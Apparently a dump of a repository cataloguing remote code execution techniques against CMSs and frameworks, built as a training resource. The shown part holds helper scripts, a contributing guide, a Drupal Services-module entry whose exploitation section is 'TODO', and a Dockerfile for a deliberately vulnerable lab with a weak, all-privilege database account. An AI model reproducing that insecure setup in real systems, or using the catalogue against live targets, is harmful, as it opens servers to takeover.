├── .github ├── FUNDING.yml └── manage │ ├── manage.py │ ├── modify_all_json.py │ └── templates │ ├── category_README.md.jinja2 │ └── main_README.md.jinja2 ├── CONTRIBUTING.md ├── Content-Management-Systems-(CMS) ├── Drupal │ ├── README.md │ └── techniques │ │ ├── Services-module-unserialize-to-rce │ │ ├── README.md │ │ ├── technique.json │ │ └── test_env │ │ │ ├── Dockerfile │ │ │ ├── Makefile │ │ │ └── files │ │ │ ├── apache2.conf │ │ │ └── services-7.x-3.18.tar.gz │ │ ├── Upload-a-plugin │ │ ├── README.md │ │ ├── technique.json │ │ └── test_env │ │ │ ├── Dockerfile │ │ │ ├── Makefile │ │ │ └── files │ │ │ └── apache2.conf │ │ └── Upload-a-theme │ │ ├── README.md │ │ ├── images │ │ └── README │ │ │ ├── 2022-06-27-04-46-36.png │ │ │ ├── 2022-06-27-05-04-26.png │ │ │ ├── 2022-06-27-05-09-03.png │ │ │ ├── 2022-06-27-05-11-55.png │ │ │ └── 2022-06-27-05-14-58.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ ├── Makefile │ │ └── files │ │ └── apache2.conf ├── FuelCMS │ ├── README.md │ └── techniques │ │ └── CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution │ │ ├── README.md │ │ ├── imgs │ │ └── exploit_trigger.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ ├── Makefile │ │ └── files │ │ ├── .htaccess │ │ ├── apache2.conf │ │ └── database.php ├── Joomla │ ├── README.md │ └── techniques │ │ └── Upload-a-plugin │ │ ├── README.md │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile ├── README.md ├── SweetRice │ ├── README.md │ └── techniques │ │ ├── Add-ADS │ │ ├── README.md │ │ ├── imgs │ │ │ ├── add_ad.png │ │ │ ├── ads_page.png │ │ │ ├── dashboard.png │ │ │ └── shell.png │ │ ├── technique.json │ │ └── test_env │ │ │ ├── Dockerfile │ │ │ └── Makefile │ │ └── Modify-theme-to-include-php-code │ │ ├── README.md │ │ ├── imgs │ │ ├── dashboard.png │ │ ├── list_themes.png │ │ ├── reverse_shell.png │ │ ├── reverse_shell_received.png │ │ ├── theme_editor.png │ │ └── visite_site.png │ │ └── technique.json ├── Typo3 │ ├── README.md │ └── techniques │ │ └── Arbitrary-deserialisation │ │ ├── README.md │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile └── Wordpress │ ├── README.md │ └── techniques │ ├── Install-FileManagement-Plugin │ ├── README.md │ ├── imgs │ │ ├── Installing_filemanager.png │ │ ├── add_new.png │ │ ├── code_edit.png │ │ ├── creating_new_file.png │ │ ├── execute_commands.png │ │ ├── paste_phpshellcode.png │ │ └── plugin_page.png │ ├── technique.json │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile │ ├── Modify-theme-to-include-php-code │ ├── README.md │ ├── imgs │ │ ├── dashboard.png │ │ ├── list_themes.png │ │ ├── reverse_shell.png │ │ ├── reverse_shell_received.png │ │ ├── theme_editor.png │ │ └── visite_site.png │ ├── technique.json │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile │ └── Upload-a-plugin │ ├── README.md │ ├── WPterm_plugin.md │ ├── imgs │ ├── activate_plugin.png │ ├── dashboard.png │ ├── download_file_web.png │ ├── exec_code_web.png │ ├── installing_plugin.png │ ├── list_of_installed_plugins.png │ ├── login.png │ ├── plugin_add_new.png │ ├── upload_plugin.png │ ├── upload_wp_term.png │ └── wpterm_webshell.png │ ├── technique.json │ ├── test_env │ ├── Dockerfile │ └── Makefile │ └── wpterm.1.1.9.zip ├── Frameworks ├── Apache-Tomcat │ ├── README.md │ └── techniques │ │ ├── CVE-2017-12615_-_PUT_a_jsp_file │ │ ├── README.md │ │ └── technique.json │ │ └── Deploy-an-application │ │ ├── README.md │ │ ├── imgs │ │ ├── compile.png │ │ ├── exec_code_web.png │ │ ├── manager.png │ │ ├── upload_a_plugin.png │ │ └── webshell_uploaded.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ ├── Makefile │ │ └── files │ │ ├── context.xml │ │ └── tomcat-users.xml ├── JBoss │ ├── README.md │ └── techniques │ │ └── Upload-a-plugin │ │ ├── README.md │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile ├── JoGet │ ├── README.md │ └── techniques │ │ └── Upload-a-plugin │ │ ├── README.md │ │ ├── imgs │ │ ├── demo.mp4 │ │ ├── exec_code_web.png │ │ ├── ip_whitelist_api.png │ │ ├── manage_plugins_interface.png │ │ ├── plugin_installed_and_ready.png │ │ └── upload_a_plugin.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile ├── README.md └── WildFly │ ├── README.md │ └── techniques │ └── Deploy-an-application │ ├── README.md │ ├── imgs │ ├── wildfly_console.png │ └── wildfly_console_login.png │ ├── technique.json │ └── test_env │ ├── Dockerfile │ └── Makefile ├── Learning-Management-Systems-(LMS) ├── Moodle │ ├── README.md │ └── techniques │ │ └── Upload-a-plugin │ │ ├── README.md │ │ ├── imgs │ │ ├── Install_plugins_page.png │ │ ├── choose_plugin_zip_file.png │ │ ├── download_file_web.png │ │ ├── exec_code_web.png │ │ ├── install_plugin_from_zip_file.png │ │ ├── plugin_successfully_uploaded.png │ │ ├── site_dashboard.png │ │ ├── upload_and_install.png │ │ └── upload_and_install_choose_file.png │ │ └── technique.json └── README.md ├── Other ├── GLPI │ ├── README.md │ └── techniques │ │ └── GLPI_shellcommand_plugin_authenticated_rce │ │ └── README.md ├── GiTea │ ├── README.md │ └── techniques │ │ └── User-with-git-hooks-activated │ │ ├── README.md │ │ ├── imgs │ │ ├── gitea_reverse_shell.png │ │ ├── gitea_service_after_exploit.png │ │ ├── gitea_service_before_exploit.png │ │ ├── may_create_git_hooks.png │ │ └── post_receive_hook.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile ├── Gitlab │ ├── README.md │ └── techniques │ │ └── CVE-2021-22205 - Unauthenticated RCE using ExifTool │ │ ├── README.md │ │ ├── imgs │ │ ├── gitlab_approximative_version.png │ │ ├── gitlab_version.png │ │ ├── metasploit_gitlab_rce.png │ │ ├── nuclei_id.png │ │ ├── nuclei_tags.png │ │ └── rev_shell_python.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile ├── Jenkins │ ├── README.md │ └── techniques │ │ └── Execute-a-script-in-the-console │ │ ├── README.md │ │ ├── imgs │ │ ├── demo.mp4 │ │ ├── manage.png │ │ ├── reverse_shell.png │ │ ├── script_console.png │ │ ├── shell.png │ │ └── welcome.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile ├── LimeSurvey │ ├── README.md │ └── techniques │ │ └── Upload-a-plugin │ │ ├── README.md │ │ ├── imgs │ │ ├── configuration_plugins.png │ │ ├── exec_code_web.png │ │ └── upload_and_install.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile ├── PHP │ ├── README.md │ └── techniques │ │ └── PHP-8.1.0-dev-User-Agentt-RCE │ │ ├── README.md │ │ ├── imgs │ │ └── phpinfo.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile ├── README.md ├── Rocket.Chat │ ├── README.md │ └── techniques │ │ └── Add-an-integration-script │ │ ├── README.md │ │ ├── imgs │ │ ├── add_integration.png │ │ ├── add_integration_page.png │ │ ├── admin_page.png │ │ ├── dashboard.png │ │ ├── getting_webhook_url.png │ │ ├── got_shell.png │ │ ├── integration_enabled.png │ │ ├── script_added.png │ │ └── service_unavaible.png │ │ ├── technique.json │ │ └── test_env │ │ ├── Dockerfile │ │ └── Makefile └── Webmin │ ├── README.md │ └── techniques │ └── CVE-2022-36446_-_Webmin_1.996_authenticated_rce │ ├── README.md │ ├── imgs │ ├── exploit_interactive_mode.png │ ├── exploit_single_command_mode.png │ ├── login.png │ └── software_package_updates.png │ ├── technique.json │ └── test_env │ ├── Dockerfile │ └── Makefile └── README.md /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: p0dalirius 4 | patreon: Podalirius -------------------------------------------------------------------------------- /.github/manage/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # File name : manage.py 4 | # Author : Podalirius (@podalirius_) 5 | # Date created : 6 Aug 2022 6 | 7 | import argparse 8 | import json 9 | import glob 10 | import jinja2 11 | 12 | 13 | def find_and_parse(): 14 | awesome_rce_techniques = {} 15 | for path_to_json_file in glob.glob("../../*/*/techniques/*/technique.json"): 16 | f = open(path_to_json_file, 'r') 17 | data = json.loads(f.read()) 18 | f.close() 19 | path = path_to_json_file.lstrip('./').split('/') 20 | if path[0] not in awesome_rce_techniques.keys(): 21 | awesome_rce_techniques[path[0]] = {} 22 | if path[1] not in awesome_rce_techniques[path[0]].keys(): 23 | awesome_rce_techniques[path[0]][path[1]] = {} 24 | if path[3] not in awesome_rce_techniques[path[0]][path[1]].keys(): 25 | awesome_rce_techniques[path[0]][path[1]][path[3]] = data 26 | return awesome_rce_techniques 27 | 28 | 29 | def generate_readme(awesome_rce_techniques: dict): 30 | f = open("./templates/main_README.md.jinja2", 'r') 31 | main_template = jinja2.Template(f.read()) 32 | f.close() 33 | 34 | f = open("./templates/category_README.md.jinja2", 'r') 35 | category_template = jinja2.Template(f.read()) 36 | f.close() 37 | 38 | # Counting total number of techniques 39 | nb_rce_techniques = 0 40 | wip = {} 41 | not_wip = {} 42 | for category in awesome_rce_techniques.keys(): 43 | for software in awesome_rce_techniques[category].keys(): 44 | for technique in awesome_rce_techniques[category][software].keys(): 45 | nb_rce_techniques += 1 46 | if awesome_rce_techniques[category][software][technique]["work_in_progress"] == True: 47 | if category not in wip.keys(): 48 | wip[category] = {} 49 | if software not in wip[category].keys(): 50 | wip[category][software] = {} 51 | if technique not in wip[category][software].keys(): 52 | wip[category][software][technique] = awesome_rce_techniques[category][software][technique] 53 | else: 54 | if category not in not_wip.keys(): 55 | not_wip[category] = {} 56 | if software not in not_wip[category].keys(): 57 | not_wip[category][software] = {} 58 | if technique not in not_wip[category][software].keys(): 59 | not_wip[category][software][technique] = awesome_rce_techniques[category][software][technique] 60 | 61 | # Generating readme 62 | print("[>] Generating 'README.md'") 63 | f = open('../../README.md', 'w') 64 | f.write(main_template.render( 65 | nb_rce_techniques=nb_rce_techniques, 66 | not_wip=not_wip, 67 | wip=wip, 68 | fct_sorted=sorted, 69 | fct_len=len 70 | )) 71 | f.close() 72 | 73 | # Generating category readmes 74 | for category in awesome_rce_techniques.keys(): 75 | print("[>] Generating '%s/README.md'" % category) 76 | f = open('../../%s/README.md' % category, 'w') 77 | f.write(category_template.render( 78 | category=category, 79 | awesome_rce_techniques=awesome_rce_techniques, 80 | fct_sorted=sorted, 81 | fct_len=len 82 | )) 83 | f.close() 84 | print("[+] All done!") 85 | 86 | 87 | def parseArgs(): 88 | parser = argparse.ArgumentParser(description="Description message") 89 | parser.add_argument("-a", "--arg", default=None, help='arg1 help message') 90 | parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)') 91 | return parser.parse_args() 92 | 93 | 94 | if __name__ == '__main__': 95 | options = parseArgs() 96 | 97 | awesome_rce_techniques_data = find_and_parse() 98 | generate_readme(awesome_rce_techniques_data) 99 | 100 | -------------------------------------------------------------------------------- /.github/manage/modify_all_json.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # File name : modify_all_json.py 4 | # Author : Podalirius (@podalirius_) 5 | # Date created : 6 Aug 2022 6 | 7 | import json 8 | import glob 9 | import os 10 | 11 | 12 | def find_techniques_and_apply_modifiers(modifiers): 13 | for path_to_json_file in glob.glob("../../*/*/techniques/*/technique.json"): 14 | f = open(path_to_json_file, 'r') 15 | data = json.loads(f.read()) 16 | f.close() 17 | 18 | f = open(os.path.dirname(path_to_json_file) + os.path.sep + 'README.md', 'r') 19 | readme = f.read() 20 | f.close() 21 | 22 | # Do stuff 23 | for fct_modifier in modifiers: 24 | data = fct_modifier(data, readme) 25 | 26 | # Write 27 | f = open(path_to_json_file, 'w') 28 | f.write(json.dumps(data, indent=4)) 29 | f.close() 30 | 31 | 32 | def add_references(data, readme): 33 | readme = readme.strip() 34 | if "## References" in readme: 35 | data["references"] = [] 36 | references = readme.split("## References")[-1].split('\n') 37 | for ref_line in references: 38 | if "http" in ref_line: 39 | ref_line = 'http' + ref_line.split('http', 1)[1].strip() 40 | data["references"].append(ref_line) 41 | return data 42 | 43 | 44 | def add_work_in_progress(data, readme): 45 | data["work_in_progress"] = False 46 | return data 47 | 48 | 49 | if __name__ == '__main__': 50 | 51 | modifiers = [add_work_in_progress, add_references] 52 | 53 | find_techniques_and_apply_modifiers(modifiers) 54 | -------------------------------------------------------------------------------- /.github/manage/templates/category_README.md.jinja2: -------------------------------------------------------------------------------- 1 | # {{ category }} 2 | 3 | ## Softwares 4 | {% for software in fct_sorted(awesome_rce_techniques[category].keys()) %} 5 | - [**{{ software }}**: ({{ fct_len(awesome_rce_techniques[category][software].keys()) }} {{ "technique" if fct_len(awesome_rce_techniques[category][software].keys()) == 1 else "techniques" }})](./{{ software }}/){% endfor %} 6 | 7 | -------------------------------------------------------------------------------- /.github/manage/templates/main_README.md.jinja2: -------------------------------------------------------------------------------- 1 | # Awesome RCE techniques 2 | 3 |

4 | Awesome list of techniques to achieve Remote Code Execution (RCE) on various apps! 5 |
6 | Number of RCE techniques 7 | 8 | YouTube Channel Subscribers 9 |
10 |

11 | 12 | ## Goal of this project 13 | 14 | The goal of this project is to provide an OpenSource knowledge database of all the techniques to achieve Remote Code Execution (RCE) on various applications. All of these techniques also comes with a test environnement (usually a Docker image) for you to train these techniques. 15 | 16 | ## Techniques 17 | 18 | {% for category in fct_sorted(not_wip.keys()) %} 19 | - [{{ category }}](./{{ category }}/){% for software in fct_sorted(not_wip[category].keys()) %} 20 | + [**{{ software }}**: ({{ fct_len(not_wip[category][software].keys()) }} {{ "technique" if fct_len(not_wip[category][software].keys()) == 1 else "techniques" }})](./{{ category }}/{{ software }}/){% endfor %} 21 | 22 | {% endfor %} 23 | 24 | ## Work in progress 25 | 26 | These techniques are a work in progress. You can help us finish them by opening a pull request! 27 | 28 | {% for category in fct_sorted(wip.keys()) %} 29 | - [{{ category }}](./{{ category }}/){% for software in fct_sorted(wip[category].keys()) %}{% for technique in fct_sorted(wip[category][software].keys()) %} 30 | + 🔧 [**{{ software }}**: {{ wip[category][software][technique]["name"] }}](./{{ category }}/{{ software }}/techniques/{{ technique }}/) 31 | {% endfor %}{% endfor %} 32 | {% endfor %} 33 | 34 | ## Troubleshooting 35 | 36 | Report all the issues on https://github.com/p0dalirius/Awesome-RCE-techniques/issues. 37 | 38 | ## Contributors 39 | 40 | Pull requests are welcome. Feel free to open an issue if you want to add other Remote Code Execution (RCE) techniques. 41 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Introduction 2 | 3 | ### Welcome contributors! 4 | 5 | First off, thank you for considering contributing to Awesome-RCE-techniques. It's people like you that make Awesome-RCE-techniques such a great ressource. 6 | 7 | ### Our guidelines. 8 | 9 | Please take a moment to review this document in order to make the contribution process easy and effective for everyone involved. Awesome-RCE-techniques is a compilation of code exectution techniques that aims to be the most comprehansive and beginner friendly. 10 | 11 | 12 | ### Contributions we are looking for. 13 | 14 | Documentating all the RCE techniques is a time consuming process, you can help by : 15 | 16 | * Reporting a technique or an application that isn't covered yet. Consider adding all the informations you got to help 17 | the team (github page, version, screenshot, documentation, walkthrough ...) 18 | * Writing a step-by-step process of how to achieve Remote Code Execution on this application. 19 | * Providing test environnment (docker) to allow everyone to try these Remote Code Execution (RCE) techniques locally. 20 | 21 | ### Contributions we are NOT looking for. 22 | 23 | Please, don't use the issue tracker for support questions. If you can't figure out how to RCE an application, feel free to check this ressources: 24 | 25 | * The Hacker Recipes (https://www.thehacker.recipes/) 26 | * HackTricks (https://book.hacktricks.xyz/welcome/readme) 27 | * Payloads All The Things (https://github.com/swisskyrepo/PayloadsAllTheThings) 28 | 29 | # Community Code of Conduct 30 | 31 | ### Be respectful 32 | 33 | > This community and its members treat one another with respect. Everyone can make a valuable contribution to Awesome-RCE-techniques. We may not always agree, but disagreement is no excuse for poor behavior and poor manners. We might all experience some frustration now and then, but we cannot allow that frustration to turn into a personal attack. It's important to remember that a community where people feel uncomfortable or threatened isn't a productive one. We expect members of the community to be respectful when dealing with other contributors as well as with people outside the Awesome-RCE-techniques project and with users of this documentation. 34 | 35 | ### Be collaborative 36 | 37 | > Collaboration is central to the free software community. We should always be open to collaboration. Your work should be done 38 | transparently and patches should be given back to the community when they're made, not just when the distribution releases. If you wish to work on new code for existing upstream projects, at least keep those projects informed of your ideas and progress. It many not be possible to get consensus from upstream, or even from your colleagues about the correct implementation for an idea, so don't feel obliged to have that agreement before you begin, but at least keep the outside world informed of your work, and publish your work in a way that allows outsiders to test, discuss, and contribute to your efforts. 39 | 40 | ### When you disagree, consult others 41 | 42 | > Disagreements, both political and technical, happen all the time and the Celery community is no exception. It's important that we resolve disagreements and differing views constructively and with the help of the community and community process. If you really want to go a different way, then we encourage you to make a derivative distribution or alternate set of packages that still build on the work we've done to utilize as common of a core as possible. 43 | 44 | ### When you're unsure, ask for help 45 | 46 | > Nobody knows everything, and nobody is expected to be perfect. Asking questions avoids many problems down the road, and so questions are encouraged. Those who are asked questions should be responsive and helpful. However, when asking a question, care must be taken to do so in an appropriate forum. 47 | 48 | ### Step down considerately 49 | 50 | Developers on every project come and go and here is no different. When you leave or disengage from the project, in whole or in part, we ask that you do so in a way that minimizes disruption to the project. This means you should tell people you're leaving and take the proper steps to ensure that others can pick up where you left off. 51 | 52 | [source: [Celery](https://github.com/celery/celery/blob/master/CONTRIBUTING.rst#community-code-of-conduct) 53 | 54 | # Your First Contribution 55 | 56 | > Unsure where to begin contributing to Awesome-RCE-techniques? You can start by looking through these beginner and help-wanted issues: 57 | > Beginner issues - issues which should only require a few lines of code, and a test or two. 58 | > Help wanted issues - issues which should be a bit more involved than beginner issues. 59 | > Both issue lists are sorted by total number of comments. While not perfect, number of comments is a reasonable proxy for impact a given change will have. 60 | 61 | [source: [Atom](https://github.com/atom/atom/blob/master/CONTRIBUTING.md#your-first-code-contribution)] **Need more inspiration?** [1] [Read the Docs](http://docs.readthedocs.org/en/latest/contribute.html#contributing-to-development) [2] [Django](https://docs.djangoproject.com/en/dev/internals/contributing/new-contributors/#first-steps) (scroll down to "Guidelines" as well) 62 | 63 | ### You never contributed to an open source project ? 64 | Here are a couple of friendly tutorials: http://makeapullrequest.com/ and http://www.firsttimersonly.com/ 65 | 66 | > Working on your first Pull Request? You can learn how from this *free* series, [How to Contribute to an Open Source Project on GitHub](https://egghead.io/series/how-to-contribute-to-an-open-source-project-on-github). 67 | 68 | [source: [React](https://github.com/facebook/react/blob/master/CONTRIBUTING.md#pull-requests)] 69 | 70 | As a side note, it helps to use newcomer-friendly language throughout the rest of your document. Here are a couple of examples from [Active Admin](https://github.com/activeadmin/activeadmin/blob/master/CONTRIBUTING.md): 71 | 72 | >At this point, you're ready to make your changes! Feel free to ask for help; everyone is a beginner at first :smile_cat: 73 | > 74 | >If a maintainer asks you to "rebase" your PR, they're saying that a lot of code has changed, and that you need to update your branch so it's easier to merge. 75 | 76 | # Getting started 77 | ### Give them a quick walkthrough of how to submit a contribution. 78 | How you write this is up to you, but some things you may want to include: 79 | 80 | >For something that is bigger than a one or two line fix: 81 | 82 | >1. Create your own fork of the code 83 | >2. Do the changes in your fork 84 | >3. If you like the change and think the project could use it: 85 | * Be sure you have followed the code style for the project. 86 | * Sign the Contributor License Agreement, CLA, with the jQuery Foundation. 87 | * Note the jQuery Foundation Code of Conduct. 88 | * Send a pull request indicating that you have a CLA on file. 89 | 90 | [source: [Requirejs](http://requirejs.org/docs/contributing.html)] **Need more inspiration?** [1] [Active Admin](https://github.com/activeadmin/activeadmin/blob/master/CONTRIBUTING.md#1-where-do-i-go-from-here) [2] [Node.js](https://github.com/nodejs/node/blob/master/CONTRIBUTING.md#code-contributions) [3] [Ember.js](https://github.com/emberjs/ember.js/blob/master/CONTRIBUTING.md#pull-requests) 91 | 92 | ### If you have a different process for small or "obvious" fixes, let them know. 93 | 94 | > Small contributions such as fixing spelling errors, where the content is small enough to not be considered intellectual property, can be submitted by a contributor as a patch, without a CLA. 95 | > 96 | >As a rule of thumb, changes are obvious fixes if they do not introduce any new functionality or creative thinking. As long as the change does not affect functionality, some likely examples include the following: 97 | >* Spelling / grammar fixes 98 | >* Typo correction, white space and formatting changes 99 | >* Comment clean up 100 | >* Bug fixes that change default return values or error codes stored in constants 101 | >* Adding logging messages or debugging output 102 | >* Changes to ‘metadata’ files like Gemfile, .gitignore, build scripts, etc. 103 | >* Moving source files from one directory or package to another 104 | 105 | [source: [Chef](https://github.com/chef/chef/blob/master/CONTRIBUTING.md#chef-obvious-fix-policy)] **Need more inspiration?** [1] [Puppet](https://github.com/puppetlabs/puppet/blob/master/CONTRIBUTING.md#making-trivial-changes) 106 | 107 | # How to report a bug 108 | ### Explain security disclosures first! 109 | At bare minimum, include this sentence: 110 | > If you find a security vulnerability, do NOT open an issue. Email XXXX instead. 111 | 112 | If you don’t want to use your personal contact information, set up a “security@” email address. Larger projects might have more formal processes for disclosing security, including encrypted communication. (Disclosure: I am not a security expert.) 113 | 114 | > Any security issues should be submitted directly to security@travis-ci.org 115 | > In order to determine whether you are dealing with a security issue, ask yourself these two questions: 116 | > * Can I access something that's not mine, or something I shouldn't have access to? 117 | > * Can I disable something for other people? 118 | > 119 | > If the answer to either of those two questions are "yes", then you're probably dealing with a security issue. Note that even if you answer "no" to both questions, you may still be dealing with a security issue, so if you're unsure, just email us at security@travis-ci.org. 120 | 121 | [source: [Travis CI](https://github.com/travis-ci/travis-ci/blob/master/CONTRIBUTING.md)] **Need more inspiration?** [1] [Celery](https://github.com/celery/celery/blob/master/CONTRIBUTING.rst#security) [2] [Express.js](https://github.com/expressjs/express/blob/master/Security.md) 122 | 123 | ### Tell your contributors how to file a bug report. 124 | You can even include a template so people can just copy-paste (again, less work for you). 125 | 126 | > When filing an issue, make sure to answer these questions: 127 | > 128 | > 1. What operating system and processor architecture are you using? 129 | > 2. What did you do? 130 | > 3. What did you expect to see? 131 | > 4. What did you see instead? 132 | 133 | [source: [Go](https://github.com/golang/go/blob/master/CONTRIBUTING.md#filing-issues)] **Need more inspiration?** [1] [Celery](https://github.com/celery/celery/blob/master/CONTRIBUTING.rst#other-bugs ) [2] [Atom](https://github.com/atom/atom/blob/master/CONTRIBUTING.md#reporting-bugs) (includes template) 134 | 135 | # How to suggest a feature or enhancement 136 | ### If you have a particular roadmap, goals, or philosophy for development, share it here. 137 | This information will give contributors context before they make suggestions that may not align with the project’s needs. 138 | 139 | > The Express philosophy is to provide small, robust tooling for HTTP servers, making it a great solution for single page applications, web sites, hybrids, or public HTTP APIs. 140 | > 141 | > Express does not force you to use any specific ORM or template engine. With support for over 14 template engines via Consolidate.js, you can quickly craft your perfect framework. 142 | 143 | [source: [Express](https://github.com/expressjs/express#philosophy)] **Need more inspiration?** [Active Admin](https://github.com/activeadmin/activeadmin#goals) 144 | 145 | ### Explain your desired process for suggesting a feature. 146 | If there is back-and-forth or signoff required, say so. Ask them to scope the feature, thinking through why it’s needed and how it might work. 147 | 148 | > If you find yourself wishing for a feature that doesn't exist in Elasticsearch, you are probably not alone. There are bound to be others out there with similar needs. Many of the features that Elasticsearch has today have been added because our users saw the need. Open an issue on our issues list on GitHub which describes the feature you would like to see, why you need it, and how it should work. 149 | 150 | [source: [Elasticsearch](https://github.com/elastic/elasticsearch/blob/master/CONTRIBUTING.md#feature-requests)] **Need more inspiration?** [1] [Hoodie](https://github.com/hoodiehq/hoodie/blob/master/CONTRIBUTING.md#feature-requests) [2] [Ember.js](https://github.com/emberjs/ember.js/blob/master/CONTRIBUTING.md#requesting-a-feature) 151 | 152 | # Code review process 153 | 154 | ### Explain how a contribution gets accepted after it’s been submitted. 155 | 156 | Who reviews it? Who needs to sign off before it’s accepted? When should a contributor expect to hear from you? How can contributors get commit access, if at all? 157 | 158 | > The core team looks at Pull Requests on a regular basis in a weekly triage meeting that we hold in a public Google Hangout. The hangout is announced in the weekly status updates that are sent to the puppet-dev list. Notes are posted to the Puppet Community community-triage repo and include a link to a YouTube recording of the hangout. 159 | > After feedback has been given we expect responses within two weeks. After two weeks we may close the pull request if it isn't showing any activity. 160 | 161 | [source: [Puppet](https://github.com/puppetlabs/puppet/blob/master/CONTRIBUTING.md#submitting-changes)] **Need more inspiration?** [1] [Meteor](https://meteor.hackpad.com/Responding-to-GitHub-Issues-SKE2u3tkSiH ) [2] [Express.js](https://github.com/expressjs/express/blob/master/Contributing.md#becoming-a-committer) 162 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/README.md: -------------------------------------------------------------------------------- 1 | # Drupal 2 | 3 | Drupal is a free and open-source web content management system written in PHP and distributed under the GNU General Public License. Drupal provides an open-source back-end framework for at least 14% of the top 10,000 websites worldwide—ranging from personal blogs to corporate, political, and government sites. 4 | 5 | - https://www.drupal.org/ 6 | 7 | ## Techniques to achieve RCE on Drupal 8 | 9 | ### With admin credentials 10 | 11 | - [Services module unserialize to rce](./techniques/Services-module-unserialize-to-rce/README.md) 12 | - [Upload a plugin](./techniques/Upload-a-plugin/README.md) 13 | - [Upload a Theme](./techniques/Upload-a-theme/README.md) -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/README.md: -------------------------------------------------------------------------------- 1 | # Drupal 7.x - Services module unserialize() to RCE 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on Drupal. 6 | 7 | ## Exploitation 8 | 9 | TODO 10 | 11 | ## References 12 | - https://www.ambionics.io/blog/drupal-services-module-rce 13 | - https://www.drupal.org/node/2858847 14 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Drupal 7.x - Services module unserialize() to RCE", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://www.ambionics.io/blog/drupal-services-module-rce", 6 | "https://www.drupal.org/node/2858847" 7 | ] 8 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | ENV DRUPALVERSION "7.54" 4 | 5 | RUN apt-get -y -q update; \ 6 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server composer 7 | 8 | COPY ./files/apache2.conf /etc/apache2/apache2.conf 9 | COPY ./files/services-7.x-3.18.tar.gz /var/www/html/ 10 | 11 | RUN a2enmod rewrite; service mysql start;\ 12 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 13 | 14 | RUN wget "https://ftp.drupal.org/files/projects/drupal-${DRUPALVERSION}.zip" -O /tmp/drupal.zip \ 15 | && cd /var/www/html/ \ 16 | && rm index.html \ 17 | && unzip /tmp/drupal.zip \ 18 | && mv drupal-${DRUPALVERSION}/* ./ \ 19 | && composer install 20 | 21 | RUN chown www-data: -R /var/www/ 22 | 23 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 24 | echo "service mysql start" >> /entrypoint.sh ;\ 25 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 26 | chmod +x /entrypoint.sh 27 | 28 | EXPOSE 80 29 | 30 | CMD /entrypoint.sh 31 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_drupal_upload_a_plugin 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 10080:80 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 10080:80 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/files/apache2.conf: -------------------------------------------------------------------------------- 1 | # This is the main Apache server configuration file. It contains the 2 | # configuration directives that give the server its instructions. 3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about 4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific 5 | # hints. 6 | # 7 | # 8 | # Summary of how the Apache 2 configuration works in Debian: 9 | # The Apache 2 web server configuration in Debian is quite different to 10 | # upstream's suggested way to configure the web server. This is because Debian's 11 | # default Apache2 installation attempts to make adding and removing modules, 12 | # virtual hosts, and extra configuration directives as flexible as possible, in 13 | # order to make automating the changes and administering the server as easy as 14 | # possible. 15 | 16 | # It is split into several files forming the configuration hierarchy outlined 17 | # below, all located in the /etc/apache2/ directory: 18 | # 19 | # 